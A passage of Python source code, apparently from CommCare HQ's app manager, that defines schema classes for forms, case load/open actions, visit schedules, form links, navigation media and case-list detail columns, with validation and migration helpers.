case_properties = DictProperty()
# case_indices = NotImplemented
close_condition = SchemaProperty(FormActionCondition)
__eq__ = DocumentSchema.__eq__
def get_paths(self):
for path in self.case_properties.values():
yield path
if self.close_condition.type == 'if':
yield self.close_condition.question
def get_property_names(self):
return set(self.case_properties.keys())
@property
def is_subcase(self):
return bool(self.case_indices)
@property
def form_element_name(self):
return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
"""
Configuration for auto-selecting a case.
Attributes:
value_source Reference to the source of the value. For mode = fixture,
this represents the FixtureDataType ID. For mode = case
this represents the 'case_tag' for the case.
The modes 'user' and 'raw' don't require a value_source.
value_key The actual field that contains the case ID. Can be a case
index or a user data key or a fixture field name or the raw
xpath expression.
"""
mode = StringProperty(choices=[AUTO_SELECT_USER,
AUTO_SELECT_FIXTURE,
AUTO_SELECT_CASE,
AUTO_SELECT_USERCASE,
AUTO_SELECT_RAW])
value_source = StringProperty()
value_key = StringProperty(required=True)
class LoadUpdateAction(AdvancedAction):
"""
details_module: Use the case list configuration from this module to show the cases.
preload: Value from the case to load into the form. Keys are question paths, values are case properties.
auto_select: Configuration for auto-selecting the case
show_product_stock: If True list the product stock using the module's Product List configuration.
product_program: Only show products for this CommCare Supply program.
"""
details_module = StringProperty()
preload = DictProperty()
auto_select = SchemaProperty(AutoSelectCase, default=None)
show_product_stock = BooleanProperty(default=False)
product_program = StringProperty()
case_index = SchemaProperty(CaseIndex)
@property
def case_indices(self):
# Allows us to ducktype AdvancedOpenCaseAction
return [self.case_index] if self.case_index.tag else []
@case_indices.setter
def case_indices(self, value):
if len(value) > 1:
raise ValueError('A LoadUpdateAction cannot have more than one case index')
if value:
self.case_index = value[0]
else:
self.case_index = CaseIndex()
@case_indices.deleter
def case_indices(self):
self.case_index = CaseIndex()
def get_paths(self):
for path in super(LoadUpdateAction, self).get_paths():
yield path
for path in self.preload.keys():
yield path
def get_property_names(self):
names = super(LoadUpdateAction, self).get_property_names()
names.update(self.preload.values())
return names
@property
def case_session_var(self):
return 'case_id_{0}'.format(self.case_tag)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
data['case_index'] = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
name_path = StringProperty()
repeat_context = StringProperty()
case_indices = SchemaListProperty(CaseIndex)
open_condition = SchemaProperty(FormActionCondition)
def get_paths(self):
for path in super(AdvancedOpenCaseAction, self).get_paths():
yield path
yield self.name_path
if self.open_condition.type == 'if':
yield self.open_condition.question
@property
def case_session_var(self):
return 'case_id_new_{}_{}'.format(self.case_type, self.id)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
index = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
if hasattr(data.get('case_indices'), 'append'):
data['case_indices'].append(index)
else:
data['case_indices'] = [index]
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
load_update_cases = SchemaListProperty(LoadUpdateAction)
open_cases = SchemaListProperty(AdvancedOpenCaseAction)
get_load_update_actions = IndexedSchema.Getter('load_update_cases')
get_open_actions = IndexedSchema.Getter('open_cases')
def get_all_actions(self):
return itertools.chain(self.get_load_update_actions(), self.get_open_actions())
def get_subcase_actions(self):
return (a for a in self.get_all_actions() if a.case_indices)
def get_open_subcase_actions(self, parent_case_type=None):
for action in self.open_cases:
if action.case_indices:
if not parent_case_type:
yield action
else:
if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
for case_index in action.case_indices):
yield action
def get_case_tags(self):
for action in self.get_all_actions():
yield action.case_tag
def get_action_from_tag(self, tag):
return self.actions_meta_by_tag.get(tag, {}).get('action', None)
@property
def actions_meta_by_tag(self):
return self._action_meta()['by_tag']
@property
def actions_meta_by_parent_tag(self):
return self._action_meta()['by_parent_tag']
@property
def auto_select_actions(self):
return self._action_meta()['by_auto_select_mode']
@memoized
def _action_meta(self):
meta = {
'by_tag': {},
'by_parent_tag': {},
'by_auto_select_mode': {
AUTO_SELECT_USER: [],
AUTO_SELECT_CASE: [],
AUTO_SELECT_FIXTURE: [],
AUTO_SELECT_USERCASE: [],
AUTO_SELECT_RAW: [],
}
}
def add_actions(type, action_list):
for action in action_list:
meta['by_tag'][action.case_tag] = {
'type': type,
'action': action
}
for parent in action.case_indices:
meta['by_parent_tag'][parent.tag] = {
'type': type,
'action': action
}
if type == 'load' and action.auto_select and action.auto_select.mode:
meta['by_auto_select_mode'][action.auto_select.mode].append(action)
add_actions('load', self.get_load_update_actions())
add_actions('open', self.get_open_actions())
return meta
class FormSource(object):
def __get__(self, form, form_cls):
if not form:
return self
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
# for backwards compatibility of really old apps
try:
old_contents = form['contents']
except AttributeError:
pass
else:
app.lazy_put_attachment(old_contents, filename)
del form['contents']
try:
source = app.lazy_fetch_attachment(filename)
except ResourceNotFound:
source = ''
return source
def __set__(self, form, value):
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
app.lazy_put_attachment(value, filename)
form.validation_cache = None
try:
form.xmlns = form.wrapped_xform().data_node.tag_xmlns
except Exception:
form.xmlns = None
class CachedStringProperty(object):
def __init__(self, key):
self.get_key = key
def __get__(self, instance, owner):
return self.get(self.get_key(instance))
def __set__(self, instance, value):
self.set(self.get_key(instance), value)
@classmethod
def get(cls, key):
return cache.get(key)
@classmethod
def set(cls, key, value):
cache.set(key, value, 7*24*60*60) # cache for 7 days
class ScheduleVisit(IndexedSchema):
"""
due: Days after the anchor date that this visit is due
starts: Days before the due date that this visit is valid from
expires: Days after the due date that this visit is valid until (optional)
repeats: Whether this is a repeat visit (one per form allowed)
increment: Days after the last visit that the repeat visit occurs
"""
due = IntegerProperty()
starts = IntegerProperty()
expires = IntegerProperty()
repeats = BooleanProperty(default=False)
increment = IntegerProperty()
@property
def id(self):
"""Visits are 1-based indexed"""
_id = super(ScheduleVisit, self).id
return _id + 1
class FormDatum(DocumentSchema):
name = StringProperty()
xpath = StringProperty()
class FormLink(DocumentSchema):
"""
xpath: xpath condition that must be true in order to open next form
form_id: id of next form to open
"""
xpath = StringProperty()
form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
"""
starts: Days after the anchor date that this schedule starts
expires: Days after the anchor date that this schedule expires (optional)
visits: List of visits in this schedule
allow_unscheduled: Allow unscheduled visits in this schedule
transition_condition: Condition under which we transition to the next phase
termination_condition: Condition under which we terminate the whole schedule
"""
enabled = BooleanProperty(default=True)
starts = IntegerProperty()
expires = IntegerProperty()
allow_unscheduled = BooleanProperty(default=False)
visits = SchemaListProperty(ScheduleVisit)
get_visits = IndexedSchema.Getter('visits')
transition_condition = SchemaProperty(FormActionCondition)
termination_condition = SchemaProperty(FormActionCondition)
class CommentMixin(DocumentSchema):
"""
Documentation comment for app builders and maintainers
"""
comment = StringProperty(default='')
@property
def short_comment(self):
"""
Trim comment to 500 chars (about 100 words)
"""
return self.comment if len(self.comment) <= 500 else self.comment[:497] + '...'
class FormBase(DocumentSchema):
"""
Part of a Managed Application; configuration for a form.
Translates to a second-level menu on the phone
"""
form_type = None
name = DictProperty(unicode)
unique_id = StringProperty()
show_count = BooleanProperty(default=False)
xmlns = StringProperty()
version = IntegerProperty()
source = FormSource()
validation_cache = CachedStringProperty(
lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
)
post_form_workflow = StringProperty(
default=WORKFLOW_DEFAULT,
choices=ALL_WORKFLOWS
)
auto_gps_capture = BooleanProperty(default=False)
no_vellum = BooleanProperty(default=False)
form_links = SchemaListProperty(FormLink)
schedule_form_id = StringProperty()
@classmethod
def wrap(cls, data):
data.pop('validation_cache', '')
if cls is FormBase:
doc_type = data['doc_type']
if doc_type == 'Form':
return Form.wrap(data)
elif doc_type == 'AdvancedForm':
return AdvancedForm.wrap(data)
else:
try:
return CareplanForm.wrap(data)
except ValueError:
raise ValueError('Unexpected doc_type for Form', doc_type)
else:
return super(FormBase, cls).wrap(data)
@classmethod
def get_form(cls, form_unique_id, and_app=False):
try:
d = Application.get_db().view(
'app_manager/xforms_index',
key=form_unique_id
).one()
except MultipleResultsFound as e:
raise XFormIdNotUnique(
"xform id '%s' not unique: %s" % (form_unique_id, e)
)
if d:
d = d['value']
else:
raise ResourceNotFound()
# unpack the dict into variables app_id, module_id, form_id
app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]
app = Application.get(app_id)
form = app.get_form(unique_id)
if and_app:
return form, app
else:
return form
def pre_delete_hook(self):
raise NotImplementedError()
def pre_move_hook(self, from_module, to_module):
""" Called before a form is moved between modules or to a different position """
raise NotImplementedError()
def wrapped_xform(self):
return XForm(self.source)
def validate_form(self):
vc = self.validation_cache
if vc is None:
# formtranslate requires all attributes to be valid xpaths, but
# vellum namespaced attributes aren't
form = self.wrapped_xform()
form.strip_vellum_ns_attributes()
try:
if form.xml is not None:
validate_xform(etree.tostring(form.xml),
version=self.get_app().application_version)
except XFormValidationError as e:
validation_dict = {
"fatal_error": e.fatal_error,
"validation_problems": e.validation_problems,
"version": e.version,
}
vc = self.validation_cache = json.dumps(validation_dict)
else:
vc = self.validation_cache = ""
if vc:
try:
raise XFormValidationError(**json.loads(vc))
except ValueError:
self.validation_cache = None
return self.validate_form()
return self
def validate_for_build(self, validate_module=True):
errors = []
try:
module = self.get_module()
except AttributeError:
module = None
meta = {
'form_type': self.form_type,
'module': module.get_module_info() if module else {},
'form': {"id": self.id if hasattr(self, 'id') else None, "name": self.name}
}
xml_valid = False
if self.source == '':
errors.append(dict(type="blank form", **meta))
else:
try:
_parse_xml(self.source)
xml_valid = True
except XFormException as e:
errors.append(dict(
type="invalid xml",
message=unicode(e) if self.source else '',
**meta
))
except ValueError:
logging.error("Failed: _parse_xml(string=%r)" % self.source)
raise
else:
try:
self.validate_form()
except XFormValidationError as e:
error = {'type': 'validation error', 'validation_message': unicode(e)}
error.update(meta)
errors.append(error)
if self.post_form_workflow == WORKFLOW_FORM:
if not self.form_links:
errors.append(dict(type="no form links", **meta))
for form_link in self.form_links:
try:
self.get_app().get_form(form_link.form_id)
except FormNotFoundException:
errors.append(dict(type='bad form link', **meta))
# this isn't great but two of FormBase's subclasses have form_filter
if hasattr(self, 'form_filter') and self.form_filter:
is_valid, message = validate_xpath(self.form_filter, allow_case_hashtags=True)
if not is_valid:
error = {
'type': 'form filter has xpath error',
'xpath_error': message,
}
error.update(meta)
errors.append(error)
errors.extend(self.extended_build_validation(meta, xml_valid, validate_module))
return errors
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
"""
Override to perform additional validation during build process.
"""
return []
def get_unique_id(self):
"""
Return unique_id if it exists, otherwise initialize it
Does _not_ force a save, so it's the caller's responsibility to save the app
"""
if not self.unique_id:
self.unique_id = random_hex()
return self.unique_id
def get_app(self):
return self._app
def get_version(self):
return self.version if self.version else self.get_app().version
def add_stuff_to_xform(self, xform, build_profile_id=None):
app = self.get_app()
langs = app.get_build_langs(build_profile_id)
xform.exclude_languages(langs)
xform.set_default_language(langs[0])
xform.normalize_itext()
xform.strip_vellum_ns_attributes()
xform.set_version(self.get_version())
def render_xform(self, build_profile_id=None):
xform = XForm(self.source)
self.add_stuff_to_xform(xform, build_profile_id)
return xform.render()
@quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'])
def get_questions(self, langs, include_triggers=False,
include_groups=False, include_translations=False):
return XForm(self.source).get_questions(
langs=langs,
include_triggers=include_triggers,
include_groups=include_groups,
include_translations=include_translations,
)
@memoized
def get_case_property_name_formatter(self):
"""Get a function that formats case property names
The returned function requires two arguments
`(case_property_name, data_path)` and returns a string.
"""
try:
valid_paths = {question['value']: question['tag']
for question in self.get_questions(langs=[])}
except XFormException as e:
# punt on invalid xml (sorry, no rich attachments)
valid_paths = {}
def format_key(key, path):
if valid_paths.get(path) == "upload":
return u"{}{}".format(ATTACHMENT_PREFIX, key)
return key
return format_key
def export_json(self, dump_json=True):
source = self.to_json()
del source['unique_id']
return json.dumps(source) if dump_json else source
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
try:
self.rename_xform_language(old_lang, new_lang)
except XFormException:
pass
def rename_xform_language(self, old_code, new_code):
source = XForm(self.source)
if source.exists():
source.rename_language(old_code, new_code)
source = source.render()
self.source = source
def default_name(self):
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
@property
def full_path_name(self):
return "%(app_name)s > %(module_name)s > %(form_name)s" % {
'app_name': self.get_app().name,
'module_name': self.get_module().default_name(),
'form_name': self.default_name()
}
@property
def has_fixtures(self):
return 'src="jr://fixture/item-list:' in self.source
def get_auto_gps_capture(self):
app = self.get_app()
if app.build_version and app.enable_auto_gps:
return self.auto_gps_capture or app.auto_gps_capture
else:
return False
def is_registration_form(self, case_type=None):
"""
Should return True if this form passes the following tests:
* does not require a case
* registers a case of type 'case_type' if supplied
"""
raise NotImplementedError()
def uses_usercase(self):
raise NotImplementedError()
def update_app_case_meta(self, app_case_meta):
pass
@property
@memoized
def case_list_modules(self):
case_list_modules = [
mod for mod in self.get_app().get_modules() if mod.case_list_form.form_id == self.unique_id
]
return case_list_modules
@property
def is_case_list_form(self):
return bool(self.case_list_modules)
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
def get_app(self):
return self._parent._parent
def get_module(self):
return self._parent
def get_case_type(self):
return self._parent.case_type
def check_case_properties(self, all_names=None, subcase_names=None, case_tag=None):
all_names = all_names or []
subcase_names = subcase_names or []
errors = []
# reserved_words are hard-coded in three different places!
# Here, case-config-ui-*.js, and module_view.html
reserved_words = load_case_reserved_words()
for key in all_names:
try:
validate_property(key)
except ValueError:
errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})
_, key = split_path(key)
if key in reserved_words:
errors.append({'type': 'update_case uses reserved word', 'word': key, 'case_tag': case_tag})
# no parent properties for subcase
for key in subcase_names:
if not re.match(r'^[a-zA-Z][\w_-]*$', key):
errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})
return errors
def check_paths(self, paths):
errors = []
try:
valid_paths = {question['value']: question['tag']
for question in self.get_questions(langs=[], include_triggers=True)}
except XFormException as e:
errors.append({'type': 'invalid xml', 'message': unicode(e)})
else:
no_multimedia = not self.get_app().enable_multimedia_case_property
for path in set(paths):
if path not in valid_paths:
errors.append({'type': 'path error', 'path': path})
elif no_multimedia and valid_paths[path] == "upload":
errors.append({'type': 'multimedia case property not supported', 'path': path})
return errors
def add_property_save(self, app_case_meta, case_type, name,
questions, question_path, condition=None):
if question_path in questions:
app_case_meta.add_property_save(
case_type,
name,
self.unique_id,
questions[question_path],
condition
)
else:
app_case_meta.add_property_error(
case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
def add_property_load(self, app_case_meta, case_type, name,
questions, question_path):
if question_path in questions:
app_case_meta.add_property_load(
case_type,
name,
self.unique_id,
questions[question_path]
)
else:
app_case_meta.add_property_error(
case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
class JRResourceProperty(StringProperty):
def validate(self, value, required=True):
super(JRResourceProperty, self).validate(value, required)
if value is not None and not value.startswith('jr://'):
raise BadValueError("JR Resources must start with 'jr://")
return value
class NavMenuItemMediaMixin(DocumentSchema):
"""
Language-specific icon and audio.
Properties are map of lang-code to filepath
"""
media_image = SchemaDictProperty(JRResourceProperty)
media_audio = SchemaDictProperty(JRResourceProperty)
@classmethod
def wrap(cls, data):
# ToDo - Remove after migration
for media_attr in ('media_image', 'media_audio'):
old_media = data.get(media_attr, None)
if old_media and isinstance(old_media, basestring):
new_media = {'default': old_media}
data[media_attr] = new_media
return super(NavMenuItemMediaMixin, cls).wrap(data)
def _get_media_by_language(self, media_attr, lang, strict=False):
"""
Return media-path for given language if one exists, else 1st path in the
sorted lang->media-path list
*args:
media_attr: one of 'media_image' or 'media_audio'
lang: language code
**kwargs:
strict: whether to return None if media-path is not set for lang or
to return first path in sorted lang->media-path list
"""
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr)
if not media_dict:
return None
if media_dict.get(lang, ''):
return media_dict[lang]
if not strict:
# if the queried lang key doesn't exist,
# return the first in the sorted list
for lang, item in sorted(media_dict.items()):
return item
@property
def default_media_image(self):
# For older apps that were migrated
return self.icon_by_language('default')
@property
def default_media_audio(self):
# For older apps that were migrated
return self.audio_by_language('default')
def icon_by_language(self, lang, strict=False):
return self._get_media_by_language('media_image', lang, strict=strict)
def audio_by_language(self, lang, strict=False):
return self._get_media_by_language('media_audio', lang, strict=strict)
def _set_media(self, media_attr, lang, media_path):
"""
Caller's responsibility to save doc.
Currently only called from the view which saves after all Edits
"""
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
media_dict[lang] = media_path or ''
setattr(self, media_attr, media_dict)
def set_icon(self, lang, icon_path):
self._set_media('media_image', lang, icon_path)
def set_audio(self, lang, audio_path):
self._set_media('media_audio', lang, audio_path)
def _all_media_paths(self, media_attr):
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
valid_media_paths = {media for media in media_dict.values() if media}
return list(valid_media_paths)
def all_image_paths(self):
return self._all_media_paths('media_image')
def all_audio_paths(self):
return self._all_media_paths('media_audio')
def icon_app_string(self, lang, for_default=False):
"""
Return lang/app_strings.txt translation for given lang
if a path exists for the lang
**kwargs:
for_default: whether app_string is for default/app_strings.txt
"""
if not for_default and self.icon_by_language(lang, strict=True):
return self.icon_by_language(lang, strict=True)
if for_default:
return self.icon_by_language(lang, strict=False)
def audio_app_string(self, lang, for_default=False):
"""
see note on self.icon_app_string
"""
if not for_default and self.audio_by_language(lang, strict=True):
return self.audio_by_language(lang, strict=True)
if for_default:
return self.audio_by_language(lang, strict=False)
class Form(IndexedFormBase, NavMenuItemMediaMixin):
form_type = 'module_form'
form_filter = StringProperty()
requires = StringProperty(choices=["case", "referral", "none"], default="none")
actions = SchemaProperty(FormActions)
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(Form, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta(self)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def session_var_for_action(self, action):
module_case_type = self.get_module().case_type
if action == 'open_case':
return 'case_id_new_{}_0'.format(module_case_type)
if isinstance(action, OpenSubCaseAction):
subcase_type = action.case_type
subcase_index = self.actions.subcases.index(action)
opens_case = 'open_case' in self.active_actions()
if opens_case:
subcase_index += 1
return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)
def _get_active_actions(self, types):
actions = {}
for action_type in types:
a = getattr(self.actions, action_type)
if isinstance(a, list):
if a:
actions[action_type] = a
elif a.is_active():
actions[action_type] = a
return actions
def active_actions(self):
if self.get_app().application_version == APP_V1:
action_types = (
'open_case', 'update_case', 'close_case',
'open_referral', 'update_referral', 'close_referral',
'case_preload', 'referral_preload'
)
else:
if self.requires == 'none':
action_types = (
'open_case', 'update_case', 'close_case', 'subcases',
'usercase_update', 'usercase_preload',
)
elif self.requires == 'case':
action_types = (
'update_case', 'close_case', 'case_preload', 'subcases',
'usercase_update', 'usercase_preload', 'load_from_form',
)
else:
# this is left around for legacy migrated apps
action_types = (
'open_case', 'update_case', 'close_case',
'case_preload', 'subcases',
'usercase_update', 'usercase_preload',
)
return self._get_active_actions(action_types)
def active_non_preloader_actions(self):
return self._get_active_actions((
'open_case', 'update_case', 'close_case',
'open_referral', 'update_referral', 'close_referral'))
def check_actions(self):
errors = []
subcase_names = set()
for subcase_action in self.actions.subcases:
if not subcase_action.case_type:
errors.append({'type': 'subcase has no case type'})
subcase_names.update(subcase_action.case_properties)
if self.requires == 'none' and self.actions.open_case.is_active() \
and not self.actions.open_case.name_path:
errors.append({'type': 'case_name required'})
errors.extend(self.check_case_properties(
all_names=self.actions.all_property_names(),
subcase_names=subcase_names
))
def generate_paths():
for action in self.active_actions().values():
if isinstance(action, list):
actions = action
else:
actions = [action]
for action in actions:
for path in FormAction.get_action_paths(action):
yield path
errors.extend(self.check_paths(generate_paths()))
return errors
def requires_case(self):
# all referrals also require cases
return self.requires in ("case", "referral")
def requires_case_type(self):
return self.requires_case() or \
bool(self.active_non_preloader_actions())
def requires_referral(self):
return self.requires == "referral"
def uses_parent_case(self):
"""
Returns True if any of the load/update properties references the
parent case; False otherwise
"""
return any([name.startswith('parent/')
for name in self.actions.all_property_names()])
def get_registration_actions(self, case_type):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
reg_actions = []
if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
reg_actions.append('open_case')
subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
if case_type:
subcase_actions = [a for a in subcase_actions if a.case_type == case_type]
reg_actions.extend(subcase_actions)
return reg_actions
def is_registration_form(self, case_type=None):
reg_actions = self.get_registration_actions(case_type)
return len(reg_actions) == 1
def uses_usercase(self):
return actions_use_usercase(self.active_actions())
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
errors = []
if xml_valid:
for error in self.check_actions():
error.update(error_meta)
errors.append(error)
if validate_module:
needs_case_type = False
needs_case_detail = False
needs_referral_detail = False
if self.requires_case():
needs_case_detail = True
needs_case_type = True
if self.requires_case_type():
needs_case_type = True
if self.requires_referral():
needs_referral_detail = True
errors.extend(self.get_module().get_case_errors(
needs_case_type=needs_case_type,
needs_case_detail=needs_case_detail,
needs_referral_detail=needs_referral_detail,
))
return errors
def get_case_updates(self, case_type):
# This method is used by both get_all_case_properties and
# get_usercase_properties. In the case of usercase properties, use
# the usercase_update action, and for normal cases, use the
# update_case action
if case_type == self.get_module().case_type or case_type == USERCASE_TYPE:
format_key = self.get_case_property_name_formatter()
action = self.actions.usercase_update if case_type == USERCASE_TYPE else self.actions.update_case
return [format_key(*item) for item in action.update.items()]
return []
@memoized
def get_subcase_types(self):
'''
Return a list of each case type for which this Form opens a new subcase.
:return:
'''
return {subcase.case_type for subcase in self.actions.subcases if subcase.close_condition.type == "never"}
@memoized
def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
parent_types = set()
case_properties = set()
for subcase in self.actions.subcases:
if subcase.case_type == case_type:
case_properties.update(
subcase.case_properties.keys()
)
if case_type != module_case_type and (
self.actions.open_case.is_active() or
self.actions.update_case.is_active() or
self.actions.close_case.is_active()):
parent_types.add((module_case_type, subcase.reference_id or 'parent'))
return parent_types, case_properties
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_triggers=True,
include_groups=True, include_translations=True)
}
module_case_type = self.get_module().case_type
type_meta = app_case_meta.get_type(module_case_type)
for type_, action in self.active_actions().items():
if type_ == 'open_case':
type_meta.add_opener(self.unique_id, action.condition)
self.add_property_save(
app_case_meta,
module_case_type,
'name',
questions,
action.name_path
)
if type_ == 'close_case':
type_meta.add_closer(self.unique_id, action.condition)
if type_ == 'update_case':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_save(
app_case_meta,
module_case_type,
name,
questions,
question_path
)
if type_ == 'case_preload' or type_ == 'load_from_form':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_load(
app_case_meta,
module_case_type,
name,
questions,
question_path
)
if type_ == 'subcases':
for act in action:
if act.is_active():
sub_type_meta = app_case_meta.get_type(act.case_type)
sub_type_meta.add_opener(self.unique_id, act.condition)
if act.close_condition.is_active():
sub_type_meta.add_closer(self.unique_id, act.close_condition)
for name, question_path in FormAction.get_action_properties(act):
self.add_property_save(
app_case_meta,
act.case_type,
name,
questions,
question_path
)
class MappingItem(DocumentSchema):
key = StringProperty()
# lang => localized string
value = DictProperty()
@property
def treat_as_expression(self):
"""
Returns if whether the key can be treated as a valid expression that can be included in
condition-predicate of an if-clause for e.g. if(<expression>, value, ...)
"""
special_chars = '{}()[]=<>."\'/'
return any(special_char in self.key for special_char in special_chars)
@property
def key_as_variable(self):
"""
Return an xml variable name to represent this key.
If the key contains spaces or a condition-predicate of an if-clause,
return a hash of the key with "h" prepended.
If not, return the key with "k" prepended.
The prepended characters prevent the variable name from starting with a
numeral, which is illegal.
"""
if ' ' in self.key or self.treat_as_expression:
return 'h{hash}'.format(hash=hashlib.md5(self.key).hexdigest()[:8])
else:
return 'k{key}'.format(key=self.key)
def key_as_condition(self, property):
if self.treat_as_expression:
condition = dot_interpolate(self.key, property)
return u"{condition}".format(condition=condition)
else:
return u"{property} = '{key}'".format(
property=property,
key=self.key
)
def ref_to_key_variable(self, index, sort_or_display):
if sort_or_display == "sort":
key_as_var = "{}, ".format(index)
elif sort_or_display == "display":
key_as_var = "${var_name}, ".format(var_name=self.key_as_variable)
return key_as_var
class GraphAnnotations(IndexedSchema):
display_text = DictProperty()
x = StringProperty()
y = StringProperty()
class GraphSeries(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
data_path = StringProperty()
x_function = StringProperty()
y_function = StringProperty()
radius_function = StringProperty()
class GraphConfiguration(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
annotations = SchemaListProperty(GraphAnnotations)
graph_type = StringProperty()
series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
"""
Represents a tab in the case detail screen on the phone.
Each tab is itself a detail, nested inside the app's "main" detail.
"""
header = DictProperty()
# The first index, of all fields in the parent detail, that belongs to this tab
starting_index = IntegerProperty()
# A tab may be associated with a nodeset, resulting in a detail that
# iterates through sub-nodes of an entity rather than a single entity
has_nodeset = BooleanProperty(default=False)
nodeset = StringProperty()
class DetailColumn(IndexedSchema):
"""
Represents a column in case selection screen on the phone. Ex:
{
'header': {'en': 'Sex', 'por': 'Sexo'},
'model': 'case',
'field': 'sex',
'format': 'enum',
'xpath': '.',
'enum': [
{'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
{'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
],
}
"""
header = DictProperty()
model = StringProperty()
field = StringProperty()
format = StringProperty()
enum = SchemaListProperty(MappingItem)
graph_configuration = SchemaProperty(GraphConfiguration)
case_tile_field = StringProperty()
late_flag = IntegerProperty(default=30)
advanced = StringProperty(default="")
calc_xpath = StringProperty(default=".")
filter_xpath = StringProperty(default="")
time_ago_interval = FloatProperty(default=365.25)
@property
def enum_dict(self):
"""for backwards compatibility with building 1.0 apps"""
import warnings
warnings.warn('You should not use enum_dict. Use enum instead',
DeprecationWarning)
return dict((item.key, item.value) for item in self.enum)
def rename_lang(self, old_lang, new_lang):
for dct in [self.header] + [item.value for item in self.enum]:
_rename_key(dct, old_lang, new_lang)
@property
def field_type(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[0]
else:
return 'property' # equivalent to property:parent/case_property
@property
def field_property(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[1]
else:
return self.field
class TimeAgoInterval(object):
map = {
'day': 1.0,
'week': 7.0,
'month': 30.4375,
'year': 365.25
}
@classmethod
def get_from_old_format(cls, format):
if format == 'years-ago':
return cls.map['year']
elif format == 'months-ago':
return cls.map['month']
@classmethod
def wrap(cls, data):
if data.get('format') in ('months-ago', 'years-ago'):
data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
data['format'] = 'time-ago'
# Lazy migration: enum used to be a dict, now is a list
if isinstance(data.get('enum'), dict):
data['enum'] = sorted({'key': key, 'value': value}
for key, value in data['enum'].items())
return super(DetailColumn, cls).wrap(data)
@classmethod
def from_json(cls, data):
from corehq.apps.app_manager.views.media_utils import interpolate_media_path
to_ret = cls.wrap(data)
if to_ret.format == 'enum-image':
# interpolate icons-paths
for item in to_ret.enum:
for lang, path in item.value.iteritems():
item.value[lang] = interpolate_media_path(path)
return to_ret
class SortElement(IndexedSchema):
field = StringProperty()
type = StringProperty()
direction = StringProperty()
class SortOnlyDetailColumn(DetailColumn):
"""This is a mock type, not intended to be part of a document"""
@property
def _i(self):
"""
assert that SortOnlyDetailColumn never has ._i or .id called
since it should never be in an app document
"""
raise NotImplementedError()
class CaseListLookupMixin(DocumentSchema):
"""
Allows for the addition of Android Callouts to do lookups from the CaseList
<lookup action="" image="" name="">
<extra key="" value="" />
<response key="" />
<field>
<header><text><locale id=""/></text></header>
<template><text><xpath function=""/></text></template>
</field>
</lookup>
"""
lookup_enabled = BooleanProperty(default=False)
lookup_action = StringProperty()
lookup_name = StringProperty()
lookup_image = JRResourceProperty(required=False)
lookup_extras = SchemaListProperty()
lookup_responses = SchemaListProperty()
lookup_display_results = BooleanProperty(default=False) # Display callout results in case list?
lookup_field_header = DictProperty()
lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
"""
Full configuration for a case selection screen
"""
display = StringProperty(choices=['short', 'long'])
columns = SchemaListProperty(DetailColumn)
get_columns = IndexedSchema.Getter('columns')
tabs = SchemaListProperty(DetailTab)
get_tabs = IndexedSchema.Getter('tabs')
sort_elements = SchemaListProperty(SortElement)
filter = StringProperty()
# If True, a small tile will display the case name after selection.
persist_case_context = BooleanProperty()
# If True, use case tiles in the case list
use_case_tiles = BooleanProperty()
